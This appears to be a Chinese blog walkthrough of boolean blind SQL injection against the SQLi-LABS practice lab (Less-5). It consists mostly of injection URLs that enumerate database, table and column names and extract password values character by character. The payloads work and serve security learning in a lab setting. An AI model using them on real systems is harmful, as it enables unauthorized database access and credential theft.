• SQL布尔盲注-(针对SQLi-LABS Page-1(Basic Challenges)第五关)

    库操作

    库名长度

    http://localhost/sqli/Less-5/?id=1'and (length(database())=10)--+

    其他库长度

    http://localhost/sqli/Less-5/?id=1'and (length((select schema_name from information_schema.schemata limit 0,1))=6)--+

    求本库名字符

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr(database(),1,1))>32)--+

    求其他库名字符

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>32)--+

    表操作

    表长度

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6)--+

    第二个表长度

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=6)--+

    第一个表名第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>32)--+

    第一个表名第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>32)--+

    第二个表名第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>32)--+

    第二个表名第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>32)--+

    字段操作

    求字段长度

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1))=2)--+

    求第二个字段长度

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1))=2)--+

    求第一个字段第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+

    求第一个字段第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+

    求第二个字段第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),1,1))>32)--+

    求第二个字段第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),2,1))>32)--+

    数据操作

    求第一个数据长度

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 0,1))=32)--+

    求第二个数据长度

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 1,1))=32)--+

    求第一个数据的第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),1,1))>32)--+

    求第一个数据的第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),2,1))>32)--+

    可以根据以上信息总结公式进行改编套用。

    如内容有误,欢迎评论区提出建议与意见。
  • 相关阅读:
    cas改造随笔
    数字证书KeyTool使用(第二篇)
    debug.keystore文件不存在解决办法
    SSL安全解决方案(转)
    CAS SSO:汇集配置过程中的错误解决方法
    sso笔记
    获取指定月 获取指定日期是星期几
    协同过滤推荐算法总结
    Java动态代理深入解析
    分享一个前后端分离的轻量级内容管理框架
  • 原文地址:https://www.cnblogs.com/Tzsblog/p/14189984.html
Copyright © 2020-2023  润新知